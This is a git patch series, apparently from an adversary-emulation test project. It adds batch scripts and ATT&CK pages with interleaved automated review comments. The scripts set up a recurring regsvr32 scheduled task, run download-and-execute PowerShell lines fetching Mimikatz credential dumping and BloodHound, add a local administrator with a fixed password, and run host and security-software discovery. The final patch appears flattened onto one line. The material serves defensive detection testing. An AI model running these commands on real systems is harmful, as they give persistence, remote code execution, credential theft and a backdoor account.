From 2e4ff79e6638fd20649096a79e766bda94f0c89c Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Tue, 7 Nov 2017 15:49:28 -0800
Subject: [PATCH 1/6] Chain reaction Basic Chain reaction
---
.../Chain_Reactions/chain_reaction_01.bat | 33 +++++++++++++++++++
1 file changed, 33 insertions(+)
create mode 100644 ARTifacts/Chain_Reactions/chain_reaction_01.bat
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_01.bat b/ARTifacts/Chain_Reactions/chain_reaction_01.bat
new file mode 100644
index 00000000..428d246d
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/chain_reaction_01.bat
@@ -0,0 +1,33 @@
+:: Chain Reaction 01
+::
+:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
+:: NOTE We recommend executing from a server that you control.
+:: NOTE Thank You :)
+:: This particular Chain Reaction focuses on generating event noise.
+
+:: Tactics: Persistence, Defense Evasion
+:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
+:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
+:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
+
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+
+:: Tactic: Discovery
+:: Execution: https://attack.mitre.org/wiki/Technique/T1086
+:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
+
+:: Tactic: Credential Access
+:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
+:: Add a user, then add to group
+
+Net user /add Trevor SmshBgr123
+
+:: Add user to group
+
+net localgroup administrators Trevor /add
+
+ECHO Well that was fun!
+
+pause
From e843ca71e7e2eb5fd1c63714800ea4443424bf63 Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Wed, 8 Nov 2017 22:19:10 -0800
Subject: [PATCH 2/6] Linux + Add Account Discovery + Fix Cron Job title
---
Linux/Discovery/Account_Discovery.md | 17 +++++++++++++++++
Linux/Persistence/Cron_Job.md | 2 +-
2 files changed, 18 insertions(+), 1 deletion(-)
create mode 100644 Linux/Discovery/Account_Discovery.md
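Review bot: `Net user /add Trevor SmshBgr123` followed by `net localgroup administrators Trevor /add` leaves a local administrator with a publicly known password on the host, and nothing in the script removes it or the scheduled task, so the "test" persists as a real backdoor after `pause`. Add cleanup at the end, e.g. `net localgroup administrators Trevor /delete`, `net user Trevor /delete` and `SCHTASKS /Delete /TN "Atomic Testing" /F`, or at least state in the header that manual cleanup is required. The `SCHTASKS` and `powershell.exe` lines fetch their payloads from the upstream `master` branch at run time, so what executes every 30 minutes is whatever that branch holds when the task fires; pinning the raw URLs to a commit hash would make the test reproducible and limit the exposure the header comments themselves warn about. The `IEX` line hands the body of Discovery.bat to PowerShell for evaluation rather than to cmd.exe, so unless that file is actually PowerShell it will likely error rather than produce the discovery output that `> output.txt` is meant to capture — worth confirming against the payload.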
diff --git a/Linux/Discovery/Account_Discovery.md b/Linux/Discovery/Account_Discovery.md
new file mode 100644
index 00000000..307df472
--- /dev/null
+++ b/Linux/Discovery/Account_Discovery.md
@@ -0,0 +1,17 @@
+# Account Discovery
+
+MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
+
+List of all accounts:
+
+ cat /etc/passwd
+
+Currently logged in:
+
+Local:
+
+ finger
+
+Remote:
+
+ finger @
diff --git a/Linux/Persistence/Cron_Job.md b/Linux/Persistence/Cron_Job.md
index bd2891b4..09435f6a 100644
--- a/Linux/Persistence/Cron_Job.md
+++ b/Linux/Persistence/Cron_Job.md
@@ -1,4 +1,4 @@
-# Bash History
+# Cron Job
 MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
From 705f7d4dcf7c126a6d30cb31b6e2406db891ad25 Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Fri, 10 Nov 2017 13:52:27 -0800
Subject: [PATCH 3/6] Powershell - Bloodhound Added single command to download and execute Bloodhound.
---
Windows/Execution/PowerShell.md | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/Windows/Execution/PowerShell.md b/Windows/Execution/PowerShell.md
index fe138955..54085c5b 100644
--- a/Windows/Execution/PowerShell.md
+++ b/Windows/Execution/PowerShell.md
@@ -6,6 +6,10 @@ MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086)
 powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+### Download and Execute BloodHound
+
+ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
+
 ### Download Mimikatz and Dump credentials
 Just download it:
From 26854f24b0ebdae3614f946d1eb2f7f6a06f150a Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Mon, 13 Nov 2017 05:01:03 -0800
Subject: [PATCH 4/6] System Network Configuration Discovery + Added System Network Configuration Discovery
---
.../System_Network_Configuration_Discovery.md | 26 +++++++++++++++++++
1 file changed, 26 insertions(+)
create mode 100644 Windows/Discovery/System_Network_Configuration_Discovery.md
diff --git a/Windows/Discovery/System_Network_Configuration_Discovery.md b/Windows/Discovery/System_Network_Configuration_Discovery.md
new file mode 100644
index 00000000..074903c2
--- /dev/null
+++ b/Windows/Discovery/System_Network_Configuration_Discovery.md
@@ -0,0 +1,26 @@
+# System Network Configuration Discovery
+
+MITRE ATT&CK Technique: [T1016](https://attack.mitre.org/wiki/Technique/T1016)
+
+
+##
+
+Input:
+
+ ipconfig /all
+
+Input:
+
+ netsh interface show
+
+Input:
+
+ arp -a
+
+Input:
+
+ nbtstat -n
+
+Input:
+
+ net config
From 61d4797e64718b31cc282a00e8046532f9213790 Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Mon, 13 Nov 2017 11:01:57 -0700
Subject: [PATCH 5/6] Chain Reaction + New chain reaction
---
.../Chain_Reactions/chain_reaction_02.bat | 56 +++++++++++++++++++
1 file changed, 56 insertions(+)
create mode 100644 ARTifacts/Chain_Reactions/chain_reaction_02.bat
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_02.bat b/ARTifacts/Chain_Reactions/chain_reaction_02.bat
new file mode 100644
index 00000000..b5889e36
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/chain_reaction_02.bat
@@ -0,0 +1,56 @@
+:: Chain Reaction 02
+::
+:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
+:: NOTE We recommend executing from a server that you control.
+:: NOTE Thank You :)
+::
+:: This particular Chain Reaction focuses on enumeration.
+
+:: Tactic: Discovery
+:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
+:: Change IP scheme for your environment
+
+:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
+
+net.exe view
+
+net.exe view /domain
+
+:: Tactic: Discovery
+:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
+
+net localgroup "administrators"
+
+wmic useraccount get /ALL
+
+
+:: Tactic: Discovery
+:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
+
+netsh.exe advfirewall firewall show all profiles
+
+tasklist.exe | findstr cb
+
+tasklist.exe | findstr virus
+
+tasklist.exe | findstr defender
+
+:: Execution
+
+:: Tactic: Discovery
+:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
+
+ipconfig /all
+arp -a
+nbtstat -n
+
+:: Tactic: Discovery
+:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
+
+dir /s c:\ >> %temp%\download
+
+:: Tactic: Execution
+:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
+:: Download and invoke BloodHound Ingestor
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
From 407c84b6f5151c24641525975f7d638518e4ec8f Mon Sep 17 00:00:00 2001
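Review bot: The three `tasklist.exe | findstr ...` lines will miss most real security products because `findstr` matches case-sensitively by default, so a process such as `MsMpEng.exe` or any image name with a capitalised `Defender`/`Virus` never matches; use `tasklist.exe | findstr /i "cb virus defender"` (one case-insensitive pass) so the security-software step actually detects what the comment claims. `netsh.exe advfirewall firewall show all profiles` looks like a mix of two contexts — as I recall the profile listing is `netsh advfirewall show allprofiles`, while the `firewall` sub-context only accepts `show rule ...` — please confirm on a test host, since a syntax error here leaves that step producing nothing but an error line. `dir /s c:\ >> %temp%\download` appends a full recursive listing of the system drive to a fixed, extensionless file that the script never removes; document the expected size and location in the header or delete it at the end. The Account Discovery comment links to the generic technique matrix rather than a technique page; `:: Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087` would match the other sections.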
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Mon, 13 Nov 2017 11:02:39 -0700 Subject: [PATCH 6/6] Discovery Updates + More Tasklist.exe adds + Modified file directory listing to be recursive. --- .../Discovery/File_and_Directory_Discovery.md | 8 ++++---- Windows/Discovery/Security_Software_Discovery.md | 16 +++++++++++++++- 2 files changed, 19 insertions(+), 5 deletions(-) diff --git a/Windows/Discovery/File_and_Directory_Discovery.md b/Windows/Discovery/File_and_Directory_Discovery.md index 23b7aef2..b4402478 100644 --- a/Windows/Discovery/File_and_Directory_Discovery.md +++ b/Windows/Discovery/File_and_Directory_Discovery.md @@ -6,7 +6,7 @@ MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083) Input: - dir c:\ >> %temp%\download - dir "c:\Documents and Settings" >> %temp%\download - dir "c:\Program Files\" >> %temp%\download - dir d:\ >> %temp%\download + dir /s c:\ >> %temp%\download + dir /s "c:\Documents and Settings" >> %temp%\download + dir /s "c:\Program Files\" >> %temp%\download + dir /s d:\ >> %temp%\download diff --git a/Windows/Discovery/Security_Software_Discovery.md b/Windows/Discovery/Security_Software_Discovery.md index 8054c405..4843654d 100644 --- a/Windows/Discovery/Security_Software_Discovery.md +++ b/Windows/Discovery/Security_Software_Discovery.md @@ -4,12 +4,26 @@ MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1063) ### netsh - netsh.exe advfirewall firewall + netsh.exe advfirewall firewall show all profiles ### tasklist +Input: + tasklist.exe +Input: + + tasklist.exe | findstr virus + +Input: + + tasklist.exe | findstr cb + +Input: + + tasklist.exe | findstr defender + ### PowerShell
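Review bot: The new `tasklist.exe | findstr virus` / `findstr cb` / `findstr defender` inputs in Security_Software_Discovery.md are case-sensitive as written, so they will not match image names that use capital letters (e.g. `MsMpEng.exe`, or anything spelled `Defender`); a tester following this page verbatim would conclude no security software is present. Suggest `tasklist.exe | findstr /i "cb virus defender"` as the input, or add `/i` to each of the three commands. The changed `netsh.exe advfirewall firewall show all profiles` line also deserves a check on a real host — I believe the profile listing lives under `netsh advfirewall show allprofiles`, and the `firewall` sub-context only understands `show rule ...`, so this may fail with a syntax error rather than display anything. The hunk header context still labels this page T1018 while linking to T1063; the heading line itself is outside the hunk, but it is worth correcting in the same series.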